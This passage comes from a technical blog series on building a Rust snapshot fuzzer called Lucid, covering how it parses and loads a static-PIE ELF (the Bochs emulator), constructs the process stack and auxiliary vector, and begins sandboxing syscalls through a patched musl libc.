So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment. Likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of the this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

  • Flags describes the memory permissions this segment should have, we have 3 distinct memory protection schemes READ, READ | EXECUTE, and READ | WRITE
  • Offset describes how far into the physical file contents we can expect to find this segment
  • PhysAddr we don’t much care about
  • VirtAddr the virtual address this segment should be loaded at, you can tell that the first segment value for this is 0x0000000000000000 which means that it has no expectations about where it’s to be loaded.
  • MemSiz how large the segment should be in virtual memory
  • Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after the segments that aren’t page aligned, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest β€œend_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // We don't want to specify a fixed address
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));

    Ok(result as usize)

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);

    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the last 0x1000 bytes so 
    // that we are always page-aligned as required by `mprotect`
    let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length
    let mprotect_len = segment.2 as libc::size_t;

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new β€œprocess” which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated at the end.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form β€œKEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➀  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0

The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➀  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

You can see the towards the end of the data at 0x7fffffffe2d8 we can see the key 0x5, and at 0x7fffffffe2e0 we can see the value 0xc which is 12 in hex. We need some of these in order to load our ELF properly as the ELF _start routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:

  • AT_ENTRY which holds the program entry point,
  • AT_PHDR which is a pointer to the program header data,
  • AT_PHNUM which is the number of program headers,
  • AT_RANDOM which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of 0x4141414141414141 and ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
  • AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.

So the first value we place onto the stack is the β€œend-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate 
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped ennvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accomdate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accomodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.

The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.

Executing the Loaded Program

Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything we’re literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits, we don’t have one we want to run so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as a long jump target and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

ude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.


  • I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
  • Also shoutout @netspooky for helping me understand the stack layout!
  • Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)



Fuzzer Development 2: Sandboxing Syscalls

By: h0mbre
17 February 2024 at 05:00


If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if β€œfuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.


Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers, reading/writing memory, your process is executing in user-mode within your processes’ virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing it’s thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

  1. recognize that Bochs is trying to syscall, this isn’t always easy to do weirdly
  2. intercept execution and redirect to the appropriate code path
  3. save Bochs’ execution state
  4. execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
  5. return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for open, you’re not directly making a syscall, you’re calling into the library’s open function and that function is the one emitting a syscall instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:


Musl is a C library that is meant to be β€œlightweight.” This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include <stdio.h>
#include <unistd.h>
#include <lucid.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");

        if (iters == 5) { break; }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);

The program will just tell us it’s argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

